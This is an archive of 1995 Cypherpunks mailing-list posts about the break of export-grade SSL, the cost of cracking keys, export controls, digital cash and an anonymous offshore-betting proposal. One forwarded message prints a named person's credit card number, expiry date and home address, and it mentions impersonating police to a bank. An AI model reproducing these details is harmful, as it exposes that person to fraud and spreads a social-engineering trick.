>I'm just being prudent, and extra cautious.
>
>The idea.....Out of state gambling, Internet style - lets give them a
>taste of whats to come.

As you note, the Internet Casino does this (they claim), becoming
operational "soon." Also, various sports books are accessible in offshore
locations, such as Costa Rica. Phone calls.

And the idea of betting on events and outcomes is already extant. Lloyd's
of London used to take such bets.

But more germane to the Internet, there are several groups working on "idea
futures." Robin Hanson, at Caltech, is working on this. And a Web page
exists with various odds on different situations, such as "Windows '95 will
be delayed 3 months" and "Strong crypto will be banned by April 1996."

Try a Web search on "bet" and "gambling." I did one on "bet" and got a hit
on "Proposition Wagering": http://www.netaxs.com/people/sportbet/prop.htm.
(I couldn't get into it, so your mileage may vary.)

>The aim in writing this short missive to cpunks is to encourage
>someone who is more able legally to help this idea happen.

It'll only happen when someone makes it happen. Thinking about it can also
be useful, as the actual programmers may not have the same focus, but
actual examples carry more weight.

We saw betting schemes on the Extropians list, a couple of years ago.
Fairly primitive, but an example.

>Any comments on the practical and legal issues (such as exactly what
>laws I'm violating) or on getting publicity for such a scheme? This
>might be easier than we think, as the media [at least the WSJ] is well
>aware of the bookie's superior accuracy & lower cost.

First, don't worry too much about remaining anonymous. Discussing an idea,
even building a system, is not the same as operating it. Folks publically
discuss and build  remailers, but operating them is another matter. (Yes,
folks here also operate remailers....).

Second, check out the "idea futures," "proposition wagering," and "betting"
references.

Third, build on what these folks are doing. Or do it differently, but only
if your approach is superior.

Good luck!

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Thu, 17 Aug 95 01:26:37 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
In-Reply-To: <199508161745.KAA08481@jobe.shell.portal.com>
Message-ID: <Pine.SOL.3.91.950817091924.25225B-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 16 Aug 1995, Hal wrote:
 
> Ironically, I understand that an independent effort coordinated by Adam
> Back also discovered the key at approximately the same time. In
> addition, Eric Young had done a search starting at 8000000000 and
> upwards; unfortunately the key value of 7ef0961fa6 was only about one
> percent below his starting point.  Hopefully Adam will supply more
> information.

Dave Byers found it with his MasPar while searching the space that Eric 
had left out.  The MasPar was getting 1.4M keys per second and hence 
could search the entire 40 bit keyspace in about 9 days anyway.


- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 17 Aug 95 06:46:00 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: SSL challenge -- broken !
In-Reply-To: <7033.9508171341@exe.dcs.exeter.ac.uk>
Message-ID: <199508171344.JAA02573@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



aba@atlas.ex.ac.uk writes:
> The actual key used is the 40 bit key you're bruting, plus what is
> effectively an 88 bit salt (in unix password nomenclature, only unix
> password salts are typically 12 bits).

Yup, you are right. Slipped my mind. (A mind is a terrible thing to
slip...)

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 17 Aug 95 06:56:00 PDT
To: cypherpunks@toad.com
Subject: (fwd>>)309,485,009,821,345,068,724,781,056
Message-ID: <v02120d04ac58ea2e90b9@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

From: "John Hemming - CEO MarketNet"  <JohnHemming@mkn.co.uk>
Date:  Thu, 17 Aug 1995 08:39:37 AM PDT
To: www-buyinfo@allegra.att.com
Mime-Version: 1.0
Subject: 309,485,009,821,345,068,724,781,056

Like .. er ... a big number maan.

"SSL" has not been cracked "EXPORT SSL" has been cracked.  Then
if someone in the next few years can crack SSL with a confidential
master key of 128 bits with 2^88 as many required key checks (say
half the keyspace at 2^87 as our mate Damien did) then that will be
a much bigger story.

Then again it was not me floating last week ....

In the mean time we encounter the usual inane US government's
export restrictions.  Can someone put in a word for me please ...

Please Please Please Mr Clinton .... keep those export regulations
It gives people like myself a major commercial lead in provision of
encryption software.

So what can we do.

Well not being a very trusting soul at times I tried out sending the
01 (SSL 128 bit confidential) message to an export Netscape browser and
lo and behold it came up with a cipher conflict.  Well that would have
been an easy way out.

Realistically my internal browser is almost at beta test level and
we will put cipher 01 in our selection of ciphers as well as cipher
2.  We will also make available our browser to link securely to our
servers.

If anyone outside US/CA wants work done to bring their systems
up to 128 bit confidential ciphers please email
jane@jhc.co.uk

(JHC plc - JHC Internet Services - yes it does mean John Hemming & Co)

In the mean time:

My credit card number is 5434 8012 0900 2563 expires 3/97
My name is John A M Hemming
My address is 15, Chantry Road, Moseley, Birmingham B13 8DL

Who loses if you use that:

Firstly, I now have to check my
credit card statements for items that are not mine.  This will be
a pain, but it makes a point clear.

Secondly, if you use it you will be breaking the law.

Thirdly, when the merchant has to refund up to 6 months of trading
turnover on any duff orders the merchant will be seriously upset.

My name and address are a matter of public record in the UK. I have
only made the job easier by putting all of the information in one place.
The card number and expiry date are available in any one of a number
of places.  (As a City Councillor in Birmingham my address has to be
available to the public).

1.  Export SSL is good enough for credit card numbers.
2.  My bank account is protected by export SSL (I mean that you
     need to crack export SSL to look at the balances)
     Alternatively you can phone up the bank and pretend to be
     the police/head office/inland revenue and ask them.
3.  Export SSL or even import SSL is not good enough for entering
     into contracts.  Digital signatures are needed for that.

In the mean time .....

I have managed to implement PGP into my workhorse program (which
is gradually coming up to beta standard).  It seems interoperable with
the PGP.exe file in Europe.  (As long as you keep the message reasonably
short)

This allows two interesting additions

<A HREF="mailto:abc@def.com">

has been extended to

<A HREF="mailto:abc@def.com" PGPKEY="abcddbdb etc">

When you click on that it does a mailto, but also loads the PGP key
(public key and userid packets).  The program saves both the
plaintext and encrypted version and then mails out the encrypted
version.  The PGP key packet has to have the same email address
as that in the mailto otherwise the program will freak.

see

http://mkn.co.uk/

Which uses that.

Similarly

<FORM HREF="mailto:banana@orange.com" PGPKEY="asdfj">

allows the encryption of a form before it is mailed.  I do have a test
form somewhere try the pages in
http://mkn.co.uk/help+dir+test\*.*

This is quite a nice solid way of ensuring high level encryption for
passing around confidential information from forms.  Sadly the
program that does it
ftp://193.119.26.70/mktnet/pub/horse.zip
is still a little flaky.

Once I have finished off getting 128 bit confidential SSL built into
my program I shall be putting in the extensions for electronic cheques
(probably today or tomorrow, but I won't be putting that on release
even as alpha for the moment).

see
http://mkn.co.uk/help/policy/htmlext
for more details.

John
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjm@ionia.engr.sgi.com (Patrick May)
Date: Thu, 17 Aug 95 10:05:32 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
In-Reply-To: <199508161806.LAA29214@mycroft.rand.org>
Message-ID: <199508171705.KAA15070@ionia.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Perry E. Metzger writes:
 > Jim Gillogly writes:
 > > > Hal <hfinney@shell.portal.com> writes:
 > > > I am a little alarmed by the suggestion that this news could
 > > > have some marked impact on the Netscape stock price.  From our
 > > > perspective this was certainly an unsurprising result (not to
 > > > take anything away from Damien
 > > 
 > > So far it appears not to have had an effect.  The two web pages I
 > > know about that track Netscape show it holding steady a point and
 > > a half above where it opened.  Even the IF market on SSLW doesn't
 > > seem to be taking much notice of it, despite my attempts at
 > > manipulating that market.
 > 
 > I haven't seen any news stories about this on the wire
 > services. Someone would have to write a story about it first before
 > people would know...

     Expect to see something in the San Jose Mercury News in the near
future.  I contacted them to pitch the story, hoping to point out as
clearly and frequently as possible that the cracking was possible only
because of ITAR restrictions on key length.  They already have someone
working on it.

Regards,

Patrick May

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDN2ze5Yg08fDKehAQE7KAP/ZxesrP1D209BOSJV187fPwfNw5UfnpLB
W6VixTFg+1cWfpk7/kZeXd0uSjY4JiCpQnbiyvA0FJ+R+4HLRAXb28TVbQ55hCSn
Bf7MWKHis8QNU4V52jMlzRZsPlMinYNeWgGlHCEAU1CS9BVV2dKED4tpOrRVH90b
Rlz3FxXXHG4=
=KvoK
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Thu, 17 Aug 95 10:11:38 PDT
To: cypherpunks@toad.com
Subject: Idle compute cycles [Re: Netscape's Offical Response]
In-Reply-To: <199508171711.MAA02559@spectrum.bradley.edu>
Message-ID: <199508171711.KAA03255@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



Peter Shank said a lot of things I agree with in his response to Damien
Doligez' break of an SSL/RC4-40 transaction, and one thing that seems to
miss the point.

> From: shank@netscape.com (Peter Shank)
> Subject: Netscape security

> 2. The standard way to determine the level of security of any encryption
> scheme is to compare the cost of breaking it versus the value of the
> information that can be gained. In this case he had to use roughly

Agreed.

> $10,000 worth of computing power (ballpark figure for having access to
> 120 workstations and a few parallel supecomputers for 8 days) to break
> a single message. Assuming the message is protecting something of less
> value than $10,000, then this information can be protected with only
> RC4-40 security. For information of greater value, currently available
> RC4-128 security should be used.

However, the cost of breaking it to Doligez was essentially nil.  The
machines to which he had access were otherwise idle, and no other users
were competing for them.  The virtually simultaneous break by David Byers
in the team led by Adam Back was the same: idle cycles.  In fact, Byers
was delayed because a real project needed cycles on that machine.

I would hazard a guess that 90% of the compute cycles in the world are used
running screen savers... this gives a <lot> of slack for people who would
like to harness them to perform productive work like making points about
the strength of security.

I would have to say the marginal value of compute cycles is approximately
$0 until enough compute hogs come along to eat from the idle cycle trough.

> 3. Inside the US, software can support a range of stronger encryption
> options, including RC4-128, which is 2^88 times harder to break.

Absolutely.  It's incredibly annoying that companies like Netscape who
understand how to get good transaction security have to settle for "almost
good enough" -- the computing cost of the extra security is almost nil.

>                                            We would appreciate your support
> in lobbying the U.S. government to lift the export controls on encryption.
> If you'd like to help us lobby the government send email to
> export@netscape.com.

Yes!

> Finally, we'd like to reiterate that all this person has done is decrypt
> one single RC4-40 message. RC4 the algorithm and products which use the
> algorithm remain as secure as always.

Yes, but with idle cycles contributed by volunteers the decryption time
on a single RC4-40 message can very likely be reduced to a day or so at
no marginal cost to owners of existing machines... which is the whole point.

Cracking weak crypto is free, and can be combatted only by implementing
strong crypto.

	Jim Gillogly
	Highday, 25 Wedmath S.R. 1995, 17:08




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ferreira, Ben  296-4158" <BFERREIR@pchardy.petro-canada.ca>
Date: Thu, 17 Aug 95 09:16:28 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Over 350 RSA/Perl 'Munitions T-shirts' Shipped
Message-ID: <30337C02@smtpgw.pccw.petro-canada.ca>
MIME-Version: 1.0
Content-Type: text/plain



 ---------- Forwarded message ----------
Date: Tue, 15 Aug 1995 14:17:36 -0600
From: Don Henson <dhenson@itsnet.com>
To: libernet@Dartmouth.EDU
Subject: Over 350 'Munitions T-shirts' Shipped

We have thus far shipped over 350 of the RSA/Perl Munition T-shirts.
Orders are still pouring in. Don't be left out. Order your's today.

Now you can wear a TSHIRT that has been classified as a MUNITION by the
US Goverment. That's right! The US International Traffic in Arms
Regulations (ITAR) makes exporting cyrptographic materials illegal.
ITAR further defines export as providing cryptographic information to a
non-US/Canadian citizen even if you are inside the US at the time.
Providing information is further defined as telling or showing
information to a non-US/Canadian citizen. The Munitions Tshirt has a
Perl implementation of the RSA algorithm (the one used by PGP) printed
on the front along with a bar-code of the same algorithm.

What all the above means is that if you wear the Munitions Tshirt where
a non-US/Canadian citizen can see it, even if it is inside the US, you
have just exported cryptographic material (which is already freely
available outside the US) and have become a criminal in the eyes of the
US Government. Now you too can become an international arms dealer for
the price of a tshirt (US$15.95 - US$19.95, depending on size) and the
guts to wear it.

If you are a non-US/Canadian citizen, you can still own a Munitons
Tshirt by ordering the tshirt from a source that is outside the US. The
email response to a request for info (see next paragraph) includes full
instructions for ordering the tshirt no matter where you live.

For more information on how to own this classic example of civil
disobedience, just send email to dhenson@itsnet.com with the subject of
'SHIRT'. (You don't have to be a US/Canadian citizen to request the
info.) Or, if you have WWW access, just point your Web browser to:

     http://colossus.net/wepinsto/wshome.html

By the way, 25% of the profits from the sale of the tshirt (in the
US/Canada) goes to the PHIL ZIMMERMANN LEGAL DEFENSE FUND to help
defend the author of PGP from harassment and possible prosecution by
the Fedgoons.

And if you get arrested for wearing the Munitions Tshirt, we'll refund
your purchase price.  :-)

Get your Munitions Tshirt now. Who knows how long they'll stay in
production!

Don Henson, Managing Director (PGP Key ID = 0X03002DC9)
West El Paso Information Network (WEPIN)
Check out The WEPIN Store at URL:
http://colossus.net/wepinsto/wshome.html


 --

 ------------------------------------------------------
|        A L B E R T A   Advanced Computing            |
|      R E S E A R C H   & Engineering Dept.           |
|        C O U N C I L                                 |
|                                                      |
|      Mailing Address   J u l i a n   B r o m w i c h |
|            3rd Floor   Junior Research Officer       |
| 6815 - 8th Street NE   bromwich@skyler.arc.ab.ca     |
|     Calgary, Alberta                                 |
|       Canada T2E 7H7                                 |
 ------------------------------------------------------

 ------------------------------------------------------
|     R A D S S                                        |
|         Technologies                                 |
|                                                      |
|      Mailing Address   J u l i a n   B r o m w i c h |
|         Alberta Pool   Software Specialist           |
|             Box 2700   JBromwich@awp.com             |
| 505 Second Street SW                                 |
|     Calgary, Alberta   Ph:  (403) 290-5491           |
|       Canada T2P 2P5   Fax: (403) 290-5550           |
 ------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 17 Aug 95 07:54:43 PDT
To: cypherpunks@toad.com
Subject: Predicament Again
Message-ID: <199508171416.KAA12135@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Just because I love beating a dead horse...

Back in June we had the argument over whether or not Phil Z should be
worried because of the threat of prosecution hanging over him.  And a
prosecutor (?) by the name of Brian Davis as well as Tim and others thought
that I was wrong to say that I would enjoy the process because of the
opportunities for verbal abuse and point scoring that I would have were I
under threat of prosecution in a case the government couldn't win.  (Mostly
pure 1st Amendment cases.)

The reason that this is important is a big fat tactical fact.  Defeat is a
process that takes place in the mind of the enemy.  It is well known to
military types that it is possible for the weaker force to overcome the
stronger force if the stronger force can be convinced that it has lost.
People are rapidly becoming the stronger force in conflicts with governments
because of technology, but governments are trying to use intimidation where
they lack the capabilities.  They are trying to psych us (and particularly
the more credulous) out.

We can fight this weapon by constant hammering at the fact of the
government's weakness and its failure to intimidate us.

Since most of what we do on the nets is speech and since speech enjoys a
great deal of protection in the US, it is important to hit the opposition
hard in speech cases where we have a strong hand.  I certainly don't
advocate abuse of prosecutors in other cases (taxes and drugs) where
conviction is likely.  But in pure speech cases, we should really heap on
the derision.  I happen to think that the prosecution of the award-winning
Phil Zimmermann is one of those kinds of cases.

Another similar case surfaced in Connecticut.  The "Greenwich 5" had
conspired so that nonsense syllables in their high school yearbook photo
captions spelled out "Kill all the [African Americans]."  (Note the
cypherpunk significance of code use.)  There was a bit of controversy of
course and the young scholars volunteered to attend a "Civil Rights Boot
Camp" run by the now neo-conservative CORE.  Some weeks later, local and
state prosecutors announced that they would not prosecute the 5 under CT's
civil rights laws because of "lack of evidence."  Calls to The Butcher of
Waco for federal prosecution followed but have as yet had no results.

This is the sort of case in which I would advocate that the "object of
prosecutorial interest" be as aggressive and abusive as possible.  The
reason the prosecutors declined to prosecute was not lack of evidence but
lack of law violation.  The prosecutors were too cowardly to state that the
Greenwich 5's action was perfectly legal.  Since the public servants won't,
it is up to those who are attacked to do so.

The benefits of cutting through the exon in a case like this is that
prosecutors are less likely to proceed in similar cases in the future and
the public is educated as to the true state of the law.  It is recreational
as well.

DCF

"Few generals have ever been defeated because they had too many soldiers
under their command."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Thu, 17 Aug 95 14:51:28 PDT
To: Damien Doligez <Damien.Doligez@inria.fr>
Subject: Re: SSL challenge -- broken !
In-Reply-To: <9508160842.AA27120@couchey.inria.fr>
Message-ID: <Pine.3.89.9508171031.E16021-0100000@www2.software.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 16 Aug 1995, Damien Doligez wrote:

> SSL challenge -- broken
> 
> Conclusions:
> 
> * Many people have access to the amount of computing power that I used.
>   The exportable SSL protocol is supposed to be weak enough to be
>   easily broken by governments, yet strong enough to resist the attempts
>   of amateurs.

Exactly

>               It fails on the second count.  Don't trust your credit
>   card number to this protocol.

Huh?  So you run on 120 workstations worth how much?  to steal a credit
card number worth how much?  Get real - there are hundreds of ways
to get credit card numbers that cost less.  The idea is to make
breaking SSL less attractive than dumpster diving not to make it
impossible.   I'll lay odds that I could get the credit card number
of *any* individual in the US in less elapsed time and with nothing
more than a $1000 windoze machinei, a telephone and a modem.


John Pettitt
jpp@software.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Thu, 17 Aug 95 08:27:00 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
Message-ID: <v01510100ac591cbb4e10@[204.248.80.18]>
MIME-Version: 1.0
Content-Type: text/plain


>At 04:39 PM 8/16/95 -0500, you wrote:
>>> I haven't seen any news stories about this on the wire
>>> services. Someone would have to write a story about it first before
>>> people would know...
>>
>>I've suggested this to a few reporters I know..
>
>It's worth suggesting this _carefully_ so the spin's right.
>For instance "Oh, no, Netscape lets Hackers suck all the money
>out of your credit cards" would be bad :-)  On the other hand,
>"The US Government's Evil Plans to block encryption are limiting
>Netscape's export products to an encryption system already broken
>by a French university.  This means you can send credit card numbers
>safely to American web sites, but not to foreign ones - like the
>airline or hotel reservations you were making for your vacation,
>or those Irish handcrafts or bottle of Scotch you were ordering,
>or that Hong Kong magazine you were subscribing to, or the CD from
>that band in Budapest that had the great sound samples out there.
>And when you were donating to that Amazon rainforest conservation
>group, the NSA's arbitrary export rules may have just helped the
>Colombian drug cartels rip off your credit card."

Thats pretty much the spin on page B3 of the WSJ. I'll type it in when I
get the chance.


Dietrich J. Kappe | Red Planet    http://www.redweb.com/
Red Planet, L.L.C.|         "Chess Space"              /chess
1-800-RED 0 WEB   |      "MS Access Products"          /cobre
Web Publishing    | E-mail:  RedPlanet@redweb.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 17 Aug 95 11:32:44 PDT
To: "Rev. Mark Grant" <cypherpunks@toad.com
Subject: Cost to Crack Keys
Message-ID: <ac58d999110210044b77@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:45 PM 8/17/95, Rev. Mark Grant wrote:
>>      In this case he had to use roughly
>>      $10,000 worth of computing power (ballpark figure for having access to
>>      120 workstations and a few parallel supecomputers for 8 days) to break
>>      a single message.
>
>Hmm, I don't know about anyone else around here, but my workstation is
>idle 99% of the time. I could almost certainly get access to all the spare
>CPU cycles on 120 workstations for free, and I suspect that a lot of
>people (particularly hackers) could do so as well. There's no need to
>spend $ 10,000 on renting them.

But, Mark, estimates of the cost to crack a key _must_ be based on market
prices, not on opportunistic access to machines. Such access is good for
occasional, or one-shot, deals, but not for routine use.

For example, one doesn't say "Hey, I don't see how Hertz can charge $40 a
day to rent a car...my friend lets me use his for free."

The technical issues of whether there are faster ways to break the keys, or
how fast and far MIPS prices will drop, is a separate issue.

"Standard accounting practices" dictate the way to estimate production costs.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 17 Aug 95 08:45:59 PDT
To: cypherpunks@toad.com
Subject: RUB_han
Message-ID: <199508171545.LAA10941@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Hurray for PRZ and D.FR and the yet-untargeted DCF 
unconspiratorily, merrily, incites. 


Now, sordid lucre biz:


   8-17-95. NYPaper:


   "A mystery bankers love: How do credit cards stay so
   profitable?"

      The profit on credit card operations is almost five
      times the overall profit rate in banking. Last year,
      eight of the top nine commercial banks ranked by return
      on assets specialized in credit card loans. In a free
      market, this isn't supposed to happen. If the business
      is immensely profitable -- and that profitability is no
      secret -- why hasn't wideopen competition forced banks,
      at best, to offer lower interest rates to consumers or,
      at worst, at least to dissipate their excess profits in
      ever greater spending for promotion? This is not a
      pretty picture of free markets at work.


   "Mastercard Joins Banks to Plan Card That Works Like Cash."
   [This amplifies a bit the anonymous post on SmartCash.]

      The venture, called Smartcash, plans to issue what are
      called "stored value" or "electronic purse" cards.
      Customers would be able to load money onto these cards,
      say $20 or $50, at automated teller machines or by
      calling their banks with specially equipped telephones.

       "We're in a state of chaos," said Stephan Seidman, the
      editor of Smart Card Monthly, a trade publication. "A
      year ago banks said there was no good reason to issue
      smart cards. Now they are in a headlong plunge to get
      something out fast." The result, he said, is shifting
      and competing alliances that may lead to incompatible
      systems and confusion for consumers.


   Deux: RUB_han (about 10kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 17 Aug 95 12:04:05 PDT
To: cypherpunks@toad.com
Subject: The Official Cypherpunks Screen Saver?
Message-ID: <ac58dab7120210048eb3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:11 PM 8/17/95, Jim Gillogly wrote:

>I would hazard a guess that 90% of the compute cycles in the world are used
>running screen savers... this gives a <lot> of slack for people who would
>like to harness them to perform productive work like making points about
>the strength of security.

It would really be cool to have a screen saver that did useful work while
displaying pretty pictures.

Imagine a screen saver, maybe with code modules running in "After Dark,"
that updates the screen with keys tried...could be a nice demonstration of
bignums in crypto, etc. Every now and then the user would get lucky and
alarms would go off...

(Details: getting the modules to automatically divvy-up keyspace...or maybe
just let user pick his own key, or from a list, or whatever. A la the
"Chinese lottery" keycracking scheme, where set-top cable boxes (containing
computers) crunch on keys and try to match to signals sent over the
air...Schneier may have something on this in his book.)

Just a thought. The "Official Cypherpunks Screen Saver"? I'd rather have
this running on my Mac than have a t-shirt.

--Tim May

(Berkeley Systems, makers of "After Dark" for Macs and Windows, supports
third-party modules. Maybe the "Flying Toasters" could swoop down, pick up
a "key" laying on the "ground" and proceed to munch on it...the mind
boggles.)

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Thu, 17 Aug 95 10:58:01 PDT
To: cypherpunks@toad.com
Subject: Denver area meeting, SUNDAY, 8/20, 2 pm
Message-ID: <rB4MwkkAsqCF084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This one is on SUNDAY, 2 pm, at the Tivoli Food Court (at least
initially).  Send email for directions, etc.


Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Exon blows goats...but I suspect you already knew that.

iQCVAwUBMDOBpVRRFMq4NZY5AQEnVAP8CLg9z5AwjIw0ouJtxPPr6CUytFOeVPrt
cMrEm8MRUt0ay0S4F+TGMq1npcF8pxdU0jwWk9EBj+1XvTOKVpEED+kp8shafsVj
qlWGplAVUHMTF19H1VAByoz7j3VGMB2zmdNDm2ifDMNzR5Di81o7CeyvQT0sZ6zt
5XGWmHkoX3g=
=GD3W
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 17 Aug 95 11:52:45 PDT
To: "Marcel van der Peijl" <mark@unicorn.com
Subject: Re: First known purchase of physical goods with cyberbucks
Message-ID: <ac58dd4d130210042a42@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:39 PM 8/17/95, Marcel van der Peijl wrote:
>> Anyway, if anyone knows of an earlier transaction of cyberbucks for physical
>> goods than this (at 15:00 GMT 17th August 1995), then please let me know.
>
>As far as I know, the first transaction took place when I (while
>testing) bought a postcard from GlobalX, the first ecash store to
>open besides our own (and mine). It is stored in the 'DigiCash
>museum' next to early prototypes of all kinds of smartcards,
>emulators, wallets etc.
>
>This must have been around October last year (or August? Can't make
>out the postmark). Hundreds of cards were shipped by several shops,
>and stickers, lotteries, etc. Check the 'physical objects' section
>on http://www.digicash.com/shops/categorical.html
>
>Maybe you should restrict the 'first known' claim to 'first known
>purchase of physical goods with cyberbucks traded at the ECM'.
>
>Sorry!

Also, there are other potential claims for this sort of thing. Based on
varying extents to which the "electronic money" is really secure, is
cryptographically interesting, etc.

For example, more than two years ago on this list (I think it was spring of
'93, but it could've been spring of '94) there were a flurry of
transactions involving the "MagicMoney" and "TackyTokens" of Pr0ductCypher
and others. I recall Black Unicorn and others talking about transactional
exchanges involving sixpacks of beer or soft drinks. I could check my
archives, but you get the point.

And before that, there were "HExmarks" being used on the Extropians list.
There was a nominal conversion rate to real dollars, and at the time I left
that list, I had more HExmarks than anyone else.

And dozens of token-based systems, coupons, LETS systems, etc. Not to
mention the various commercial smartcards and "e money" systems.

Granted, most of these are not "Chaumian," which is what most of us think
of us as digital cash.

Claiming credit for being first is a tough issue.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.alias.net (Anonymous)
Date: Thu, 17 Aug 95 03:02:33 PDT
To: cypherpunks@toad.com
Subject: Out of state gambling
Message-ID: <199508171002.MAA01952@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Hello C-Punks:

(nb This is posted anonymously because I had this idea the implementation
of which would be (probably) illegal.  I'm not sure whether putting my 
name to the idea would be a good idea for the reason that I can't be
sure that I wouldn't be implicated under the overbroad "conspiracy" or
"Rico" powers which are oh so popular as a way of putting people away
for thought crimes.  This message will in any case have appeared via
a couple of foreign remailers on it's way. I am proud of the idea, but
I appreciate those of you who know who I am keeping quiet about it, as
I'm just being prudent, and extra cautious.

The idea.....Out of state gambling, Internet style - lets give them a
taste of whats to come.

You may recall that a short time before Pres. Clinton got elected, the
Wall Street Journal had an article about gambling taking place in Moscow
and London on the outcome of the election.  The story told by the article
was that the bookmakers in London had more up to date and better info.
than Gallup and Roper obtained with all their phone polls.  
The London bookie's accuracy was vindicated by the outcome, as Clinton
won, and by the predicted margin.

Ahhh...The power of the free market. Makes sense too, if it's your own
money on the line rather than someone else's phone call (during a meal,
of course) I wander how many US bets were placed in England (covertly,
via friends etc.).  The internet casino, which will soon be open for
business - <http://www.casino.org> - adds a new Internet related twist
to this.  Could someone, perhaps a furriner, perhaps talk to the folks
at casino.org and see if they would be willing to open a book on
presidential election outcomes.  Or perhaps organize something with
an enterprising London/Moscow gambling house, preferably with fast
IP feed, and constantly updated odds on the web.

The Internet Casino is advertising that they will be having their 
"Grand Opening" on August 18.

My aim is to make cheap, timely & accurate poll predictions, not
to encourage contravention of the gambling laws, which are, after all,
oh so important to protecting life as we know it. If some people 
choose to avoid these laws I disclaim all resposibility, but the anon.
remailer is insurance that all of you will feel the same way.

The aim in writing this short missive to cpunks is to encourage
someone who is more able legally to help this idea happen.

Just attempting to add some substance to Tim's sig. quote, about
national borders being merely "speed bumps", my ideal implementation
would see lots of e$ bets, cpunk-remailers, and (for US citizens) strong
encryption.

Any suggestions for books?
I've got a few (besides the obvious, "Who Wins"?) such as:
Which Republican will win the nomination?
Will "Speaker Newt" run.
Will "Moneybag$" enter the race?
If so, will he drop out and enter again?

Any comments on the practical and legal issues (such as exactly what
